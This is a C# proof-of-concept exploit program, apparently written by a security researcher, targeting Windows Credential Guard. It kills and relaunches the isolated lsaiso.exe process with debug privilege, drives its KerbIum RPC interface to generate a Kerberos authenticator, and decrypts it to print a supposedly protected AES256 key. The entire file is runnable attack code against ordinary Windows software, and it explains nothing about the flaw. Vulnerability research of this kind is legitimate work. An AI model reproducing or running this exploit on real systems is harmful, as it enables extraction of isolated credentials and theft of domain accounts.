﻿using KerbIumRpc;
using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Utilities.ASN1.Builder;
using NtApiDotNet.Utilities.Text;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Builder;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web.Security;

namespace poc
{
    internal static class Program
    {
        static void StopLsaIso()
        {
            using (var processes = NtProcess.GetProcesses(ProcessAccessRights.AllAccess).ToDisposableList())
            {
                foreach (var process in processes)
                {
                    if (process.Name.Equals("lsaiso.exe", StringComparison.OrdinalIgnoreCase) && !process.IsDeleting)
                    {
                        Console.WriteLine("Terminating LSAISO at PID {0}", process.ProcessId);
                        process.BreakOnTermination = false;
                        process.Terminate(0);
                        process.Wait();
                    }
                }
            }
        }

        static NtProcessCreateResult RestartLsaIso()
        {
            NtToken.EnableDebugPrivilege();
            StopLsaIso();

            string path = $@"{Environment.GetFolderPath(Environment.SpecialFolder.System)}\lsaiso.exe";
            Console.WriteLine(path);
            NtProcessCreateConfig config = new NtProcessCreateConfig
            {
                ImagePath = $@"\??\{path}",
                CommandLine = "lsaiso -CredGuard",
                Secure = true
            };
            return NtProcess.Create(config);
        }

        internal static void CheckResult(this int result)
        {
            if (result < 0)
                throw new NtException((NtStatus)result);
        }

        static Client Connect(out NdrContextHandle handle)
        {
            Client c = new Client();
            c.Connect("LSA_ISO_RPC_SERVER");
            c.KerbIumGetClientContext(out handle).CheckResult();
            return c;
        }

        internal static string ToHexDump(this byte[] ba)
        {
            HexDumpBuilder builder = new HexDumpBuilder(true, true, true, true, 0);
            builder.Append(ba);
            builder.Complete();
            return builder.ToString();
        }

        private static KERB_ENCRYPTION_KEY GetRc4Key(IEnumerable<KERB_ENCRYPTION_KEY> keys)
        {
            return GetKey(keys, KerberosEncryptionType.ARCFOUR_HMAC_MD5);
        }

        private static KERB_ENCRYPTION_KEY GetKey(IEnumerable<KERB_ENCRYPTION_KEY> keys, KerberosEncryptionType type)
        {
            return keys.Where(k => k.EncryptionType == (int)type).First();
        }

        public static KERB_ENCRYPTION_KEY[] BuildKeys(Client c, NdrContextHandle handle, string username, string realm, string password)
        {
            KerbSharedConfiguration config = new KerbSharedConfiguration(4096, 4096, 4096, 4096, 4096);
            c.KerbIumUpdateSharedConfiguration(handle, config, out config).CheckResult();

            KERB_PASSWORD_OR_BLOB pwd = new KERB_PASSWORD_OR_BLOB(IntPtr.Zero, 0, 
                new KERB_PASSWORD_OR_BLOB_UNION(0, default, new UNICODE_STRING(password)));
            c.KerbIumBuildPasswordList(handle, pwd, new UNICODE_STRING("ABC"),
                new UNICODE_STRING(realm.ToUpper()), null, null, new UNICODE_STRING(username), 0, 1, 0, 
                out KERB_STORED_CREDENTIAL? cred).CheckResult();
            return cred?.UserKeys.Select(v => v.Key).ToArray() ?? new KERB_ENCRYPTION_KEY[0];
        }

        static void RunExploit()
        {
            string password = Membership.GeneratePassword(16, 4);
            Console.WriteLine("Using password {0}", password);

            Client c = Connect(out NdrContextHandle handle);
            var keys = BuildKeys(c, handle, "alice", "DOMAIN.LOCAL", "Passw0rd1");
            var key = GetKey(keys, KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96);

            var keys2 = BuildKeys(c, handle, "bobby", "DOMAIN.LOCAL", password);
            var key2 = GetKey(keys2, KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96);
            KERB_RPC_INTERNAL_NAME name = new KERB_RPC_INTERNAL_NAME((short)KerberosNameType.PRINCIPAL, 1, new UNICODE_STRING[] { new UNICODE_STRING("alice") });

            c.KerbIumCreateApReqAuthenticator(handle, key, 0, name, new UNICODE_STRING("DOMAIN.LOCAL"), new KERB_ADJUSTED_TIME(0, 0, 0),
                key2, null, null, 3, out LARGE_INT_RPC _, out KERB_ASN1_DATA auth, out int error).CheckResult();

            var enc_data = KerberosEncryptedData.Parse(auth.Data);

            var real_key = KerberosAuthenticationKey.DeriveKey(KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96,
                "Passw0rd1", 4096, KerberosNameType.PRINCIPAL, "alice", "DOMAIN.LOCALalice", 0);

            var dec_data = enc_data.Decrypt(real_key, KerberosKeyUsage.AsRepEncryptedPart);

            var dec_auth = KerberosAuthenticator.Parse(dec_data.CipherText);

            Console.WriteLine("Decrypted Key:");
            Console.WriteLine(dec_auth.SubKey.Key.ToHexDump());

            Console.WriteLine("Error: {0}", error);

            var dec_key = KerberosAuthenticationKey.DeriveKey(KerberosEncryptionType.AES256_CTS_HMAC_SHA1_96,
                password, 4096, KerberosNameType.PRINCIPAL, "bobby", "DOMAIN.LOCALbobby", 0);

            Console.WriteLine("Expected Key:");
            Console.WriteLine(dec_key.Key.ToHexDump());
        }

        static void Main(string[] args)
        {
            try
            {
                using (var lsaiso = RestartLsaIso())
                {
                    lsaiso.Process.Wait(2);
                    if (lsaiso.Process.ExitNtStatus != NtStatus.STATUS_PENDING)
                        throw new Exception("Couldn't start lsaiso");
                }

                RunExploit();
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
